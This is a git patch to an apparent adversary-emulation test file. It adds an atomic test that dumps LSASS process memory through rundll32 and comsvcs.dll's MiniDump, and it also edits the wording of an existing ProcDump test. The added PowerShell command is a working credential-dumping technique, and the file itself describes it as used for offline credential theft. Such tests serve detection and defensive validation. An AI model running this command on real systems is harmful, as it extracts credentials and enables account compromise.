From b23f570d8a5faf963e76f312c821b027bbd2b141 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Mon, 30 Mar 2020 12:56:59 -0600 Subject: [PATCH] added Dump LSASS.exe Memory using comsvcs.dll to T1003 (#912) * added Dump LSASS.exe Memory using comsvcs.dll * Updated filemod path * Re-fixed path. Co-authored-by: Michael Haag --- atomics/T1003/T1003.yaml | 20 +++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index ec50e216..918714c7 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -153,7 +153,7 @@ atomic_tests: The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. - Upon successful execution, you should see a file the following file created C:\Windows\Temp\lsass_dump.dmp. + Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. supported_platforms: @@ -189,6 +189,24 @@ atomic_tests: cleanup_command: | del "#{output_file}" >nul 2> nul +- name: Dump LSASS.exe Memory using comsvcs.dll + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. + + Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. + + supported_platforms: + - windows + + executor: + elevation_required: true + name: powershell + command: | + C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full + cleanup_command: | + Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore + + - name: Dump LSASS.exe Memory using Windows Task Manager description: | The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task